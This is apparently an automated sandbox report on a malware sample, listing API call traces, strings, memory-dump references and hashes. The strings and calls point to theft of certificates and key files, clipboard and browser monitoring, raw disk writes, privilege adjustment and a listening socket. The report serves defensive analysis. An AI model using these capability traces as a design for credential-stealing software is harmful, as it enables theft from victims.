                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 02BCD24D
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 02BCD563
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DriveErrorModememset$CurrentDirectoryFileFindFirstLogicalStringsType
                                                                                                                                                                                                            • String ID: *.00*$.txt$.zip$asus$found.$keys$path
                                                                                                                                                                                                            • API String ID: 989413159-3811065237
APIs
• memset.MSVCRT ref: 02BCE6CF
• memset.MSVCRT ref: 02BCE6F1
• GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02BCE706
• SetErrorMode.KERNEL32(00000001), ref: 02BCE71F
• GetDriveTypeA.KERNEL32(?), ref: 02BCE768
• SetCurrentDirectoryA.KERNEL32(?), ref: 02BCE77B
• FindFirstFileA.KERNEL32(?,?), ref: 02BCE7DD
• SetErrorMode.KERNEL32(?), ref: 02BCEAF3
Strings
Memory Dump Source
• Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Yara matches
Similarity
• API ID: DriveErrorModememset$CurrentDirectoryFileFindFirstLogicalStringsType
• String ID: *.00*$.txt$.zip$asus$found.$keys$path
• API String ID: 989413159-3811065237
APIs
• memset.MSVCRT ref: 02BB118E
• GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,76F8F570), ref: 02BB11AD
• StrStrIA.SHLWAPI(00000000,java), ref: 02BB11C5
• StrStrIA.SHLWAPI(00000000,.exe), ref: 02BB11DB
• StrStrIW.SHLWAPI(?,.p12,00000000), ref: 02BB11FF
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02BB1221
• GetProcessHeap.KERNEL32(00000008,?), ref: 02BB123E
• HeapAlloc.KERNEL32(00000000), ref: 02BB1245
• memset.MSVCRT ref: 02BB1255
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02BB1271
• CreateThread.KERNEL32(00000000,00000000,02BCB4B0,00000000,00000000,00000000), ref: 02BB1285
• StrStrIW.SHLWAPI(?,serverkey.dat,00000000), ref: 02BB12A4
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02BB12D5
• GetProcessHeap.KERNEL32(00000008,?), ref: 02BB12F2
• HeapAlloc.KERNEL32(00000000), ref: 02BB12F9
• memset.MSVCRT ref: 02BB1309
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02BB1325
• CreateThread.KERNEL32(00000000,00000000,02BCEB30,00000000,00000000,00000000), ref: 02BB1339
• CreateThread.KERNEL32(00000000,00000000,02BD01A0,00000000,00000000,00000000), ref: 02BB1376
  • Part of subcall function 02BCB410: PathAddBackslashA.SHLWAPI(02C0C15C), ref: 02BCB437
  • Part of subcall function 02BCB410: PathFileExistsA.SHLWAPI(?), ref: 02BCB4A0
• GetHandleInformation.KERNEL32(00000000,?), ref: 02BB138E
• CloseHandle.KERNEL32(00000000), ref: 02BB139F
Strings
Memory Dump Source
• Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Yara matches
Similarity
• API ID: ByteCharHeapMultiWide$CreateThreadmemset$AllocFileHandlePathProcess$BackslashCloseExistsInformationModuleName
• String ID: .exe$.p12$java$serverkey.dat
• API String ID: 183229269-3502489836
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Yara matches
Similarity
• API ID: memset$FolderPathSpecialstrchr
• String ID: Desk$Network Favorites$\$o$p$t
• API String ID: 2246752426-2295261572
APIs
• memset.MSVCRT ref: 02BC323D
• GlobalLock.KERNEL32(00000000), ref: 02BC325E
• GetCurrentThreadId.KERNEL32 ref: 02BC327F
• GetGUIThreadInfo.USER32(00000000), ref: 02BC3286
• GetOpenClipboardWindow.USER32 ref: 02BC329C
• GetActiveWindow.USER32 ref: 02BC32AA
• WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 02BC32D8
• GetProcessHeap.KERNEL32(00000008,00000013), ref: 02BC32FA
• HeapAlloc.KERNEL32(00000000), ref: 02BC3301
• memset.MSVCRT ref: 02BC3311
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 02BC332E
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC337B
• HeapValidate.KERNEL32(00000000), ref: 02BC337E
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC338B
• HeapFree.KERNEL32(00000000), ref: 02BC338E
• GlobalUnlock.KERNEL32(00000000), ref: 02BC3399
• GlobalUnlock.KERNEL32(00000000,00000000,00000001), ref: 02BC33DF
Strings
Memory Dump Source
• Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Yara matches
Similarity
• API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
• String ID: 0
• API String ID: 3472172748-4108050209
APIs
• GetCommandLineA.KERNEL32(\iexplore.exe), ref: 02BC190E
• StrStrIA.SHLWAPI(00000000), ref: 02BC1915
• memset.MSVCRT ref: 02BC1990
• IsUserAnAdmin.SHELL32 ref: 02BC1999
• GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,76F8F550,76F91620,80000002), ref: 02BC19E3
• HeapValidate.KERNEL32(00000000), ref: 02BC19E6
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC19F3
• HeapFree.KERNEL32(00000000), ref: 02BC19F6
• strstr.MSVCRT ref: 02BC1A06
• strstr.MSVCRT ref: 02BC1A20
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC1A4F
• HeapValidate.KERNEL32(00000000), ref: 02BC1A52
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC1A5F
• HeapFree.KERNEL32(00000000), ref: 02BC1A62
Strings
Memory Dump Source
• Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidatestrstr$AdminCommandLineUsermemset
                                                                                                                                                                                                            • String ID: \iexplore.exe$set_url
                                                                                                                                                                                                            • API String ID: 2523706361-3242205626
                                                                                                                                                                                                            • Opcode ID: 2bb3e551e8eb6d3c67a0594aa99c7435c9f809efce73334fd34811feaa2bfc65
                                                                                                                                                                                                            • Instruction ID: be5c7065b6ad81ca9fb1ccb574a9040ef16f186e05aea69209aa9d369d72a923
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2bb3e551e8eb6d3c67a0594aa99c7435c9f809efce73334fd34811feaa2bfc65
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E4311432E9131027E77126785C09F6B3A48DF40B85F6544ACFF8AF7242EBA4C8158BE1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,76F92F00), ref: 02BD9991
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BD99AD
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?), ref: 02BD99BC
                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 02BD99C9
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 02BD9A08
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 02BD9A16
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 02BD9B0D
                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 02BD9B1C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Find$FileLocalwsprintf$AllocCloseFirstFreeNext_snprintf
                                                                                                                                                                                                            • String ID: %s%s$%s\%s$%s\*$.
                                                                                                                                                                                                            • API String ID: 2477558990-1591360731
                                                                                                                                                                                                            • Opcode ID: 576e1c5355d0aeacef1504503affc6409720645d3e22cd154972b019e9e49bb4
                                                                                                                                                                                                            • Instruction ID: b461757818bfddfe25a2474a52112285c5a7b3e154ad9055e720712d42659565
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 576e1c5355d0aeacef1504503affc6409720645d3e22cd154972b019e9e49bb4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F551B5B1604741AFD320DF54C888FEBBBE9FB85704F044A8DFA9597244E7749948CBA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: callocfree$exit
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 337157181-0
                                                                                                                                                                                                            • Opcode ID: d261e695fca6be96c204ac4bd0052be9edc10d39a0ae5c4d8e041d3f7c0048e4
                                                                                                                                                                                                            • Instruction ID: 7247ca8674091cf6db36704a8b00b6e6719b6b4cc981d7e33b820a8d1f2cbc19
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d261e695fca6be96c204ac4bd0052be9edc10d39a0ae5c4d8e041d3f7c0048e4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1F18AB5A002099BDB22CF58D884BFEB7B5FF88314F1445A9ED05AB350D7B1E951CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC3411
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(02C0DDB4,?,?,?), ref: 02BC3428
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(02C0DDB4,?,?,?), ref: 02BC3438
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BC3465
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02BC3487
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000000,76F89300), ref: 02BC34B1
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02BC34C0
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 02BC34D9
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02BC34EA
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC3507
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC3518
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Handle$CloseCreateCurrentDirectoryDriveInformationLockPointerTypeUnlockWrite_snprintfmemset
                                                                                                                                                                                                            • String ID: \\.\PhysicalDrive%u
                                                                                                                                                                                                            • API String ID: 649538874-3292898883
                                                                                                                                                                                                            • Opcode ID: e200d5c67c0da34d65dd9d7f49f7ac4c1373c32e83fcb50789fec451e430e0ee
                                                                                                                                                                                                            • Instruction ID: 4518520684267868edd14f9b80bf53e196f5528e4f79625e5a1aafec854a698c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e200d5c67c0da34d65dd9d7f49f7ac4c1373c32e83fcb50789fec451e430e0ee
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68310171A81214BBE7309B649C49FEE77ACDF01B14FA086C8F744AA0C0C7F05A908BE0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SHGetSpecialFolderPathA.SHELL32(00000000,?,?,00000000), ref: 02BDDB7A
                                                                                                                                                                                                            • strchr.MSVCRT ref: 02BDDB89
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(000004E3,00000000,Desk,Desk,?,Desk), ref: 02BDDC75
                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 02BDDC89
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharFileFindFirstFolderMultiPathSpecialWidestrchr
                                                                                                                                                                                                            • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                            • API String ID: 23527507-2295261572
                                                                                                                                                                                                            • Opcode ID: 2349119abb691fe0ae602ba3ead7e79c21212c34da9570b97533c40d44adb318
                                                                                                                                                                                                            • Instruction ID: ad70e44f3b71b1e1a38c8676d30d7e725213cebfc9182873749972113acc08a1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2349119abb691fe0ae602ba3ead7e79c21212c34da9570b97533c40d44adb318
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5415A3390065B9FEF358B24CC547FA7BA1EB42308F1446E5DACA97180F771AA85CB51
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: wsprintf$ComputerNamelstrlen
                                                                                                                                                                                                            • String ID: MSCTF.Shared.MAPPING.%x$MSCTF.Shared.MUTEX.%x
                                                                                                                                                                                                            • API String ID: 776485234-1938657081
                                                                                                                                                                                                            • Opcode ID: 8537e32d2099706dc8fb7902dd17fac125557a9a38c56de017a22b1b97f80a40
                                                                                                                                                                                                            • Instruction ID: 1c3cd91a9b4a897188389313e66f7189deb2f6f95f478f78ef66d58910e212ba
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8537e32d2099706dc8fb7902dd17fac125557a9a38c56de017a22b1b97f80a40
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D012D7268021976B2B06F999C0BCBB3758CF8566574102D5FB87925F1EDD0AE0CCAB1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                            • CloseHandle.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Token$CurrentOpenProcessThread$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                                                                                                            • String ID: SeSecurityPrivilege
                                                                                                                                                                                                            • API String ID: 731831024-2333288578
                                                                                                                                                                                                            • Opcode ID: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                            • Instruction ID: 2f4dd94adce221d10feffccf969df1866f37505423b255349c6b180ac4db3a06
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92113CB6A00205ABE710DBE0DE0DFAF7B7CAB84B41F104129BB05F61D0D7749A04C7A9
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • htons.WS2_32(?), ref: 02BE1278
                                                                                                                                                                                                            • socket.WS2_32(00000002,00000001,00000000), ref: 02BE128E
                                                                                                                                                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 02BE12A8
                                                                                                                                                                                                            • closesocket.WS2_32(00000000), ref: 02BE12B3
                                                                                                                                                                                                            • bind.WS2_32(00000000,?,00000010), ref: 02BE12CB
                                                                                                                                                                                                            • listen.WS2_32(00000000,00000005), ref: 02BE12D8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: bindclosesockethtonslistensetsockoptsocket
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4126956815-0
                                                                                                                                                                                                            • Opcode ID: 7b8ec8a6cdc7389f4e40b4d05794fef32db1ea257d2baf20bd2406e59577d5be
                                                                                                                                                                                                            • Instruction ID: d5deee60bac56d2ce315931e52385060e862402b9a849b33671bf675a8a5858a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b8ec8a6cdc7389f4e40b4d05794fef32db1ea257d2baf20bd2406e59577d5be
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7011C231B50209ABDB209B68EC09FEF7778AF04751F504255FF05EB2C1EBB09A148BA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD2B5E
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02BD2B83
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,\clmain.exe), ref: 02BD2B95
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileModuleNamememset
                                                                                                                                                                                                            • String ID: \clmain.exe
                                                                                                                                                                                                            • API String ID: 350293641-582869414
                                                                                                                                                                                                            • Opcode ID: b759224586c1d30eaa3b40a308f170ce40d7cdb5a6c36f1d36009d217b3a3228
                                                                                                                                                                                                            • Instruction ID: e88247927a0df6abc34c2f3d4caafb5f3efe1c37441550f56b9109ec78e29ed5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b759224586c1d30eaa3b40a308f170ce40d7cdb5a6c36f1d36009d217b3a3228
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8F0A7B1A842086BDBA4DA749C86BE573A89718B05F4006E5FB4EC60C0F7F016D88B91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02BDE119
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 02BDE15E
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 02BDE1D2
                                                                                                                                                                                                            • free.MSVCRT(00000000), ref: 02BDE1FF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Drive$ErrorLogicalModeStringsTypefree
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2496910992-0
                                                                                                                                                                                                            • Opcode ID: db358a6fb3f38fc74d91778b82577468dde699b863da09cdd41c1a5857a5e3d1
                                                                                                                                                                                                            • Instruction ID: c262819e331132623780e9ae66b8ffa9f7cc74b06a9afbe8a6b774b1ad754ced
                                                                                                                                                                                                            • Opcode Fuzzy Hash: db358a6fb3f38fc74d91778b82577468dde699b863da09cdd41c1a5857a5e3d1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F331497270025E8FDB10CEA8E8847EE7B64EB45351F1406E2EA458B201F731C656CBA2
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,76F93490), ref: 02BB419D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BB41A0
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB41B4
                                                                                                                                                                                                            • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BB4224
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4232
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB4235
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4242
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB4245
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000BED), ref: 02BB425D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BB4260
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB4270
                                                                                                                                                                                                            • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BB428A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4297
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB429A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB42AB
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB42AE
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-000000A9), ref: 02BB42DA
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BB42DD
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB42F4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 02BB4346
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB434D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB435E
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB4365
                                                                                                                                                                                                            • htons.WS2_32(?), ref: 02BB439D
                                                                                                                                                                                                            • htons.WS2_32(?), ref: 02BB43B0
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB43C8
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB43DA
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB43DD
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB43EA
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB43ED
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BB43F9
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB43FC
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BB4409
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB440C
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(02BB58F7,00000000,00000000,00000001), ref: 02BB446E
                                                                                                                                                                                                            • LockFile.KERNEL32(02BB58F7,00000000,00000000,00000001,00000000), ref: 02BB447E
                                                                                                                                                                                                            • WriteFile.KERNEL32(02BB58F7,00000000,00000001,00000000,00000000), ref: 02BB448D
                                                                                                                                                                                                            • UnlockFile.KERNEL32(02BB58F7,02BB58F7,00000000,00000001,00000000), ref: 02BB449D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB44AC
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB44AF
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB44BC
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB44BF
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate$File$Allocmemset$Tablehtons$LockPointerUnlockWrite_snprintf
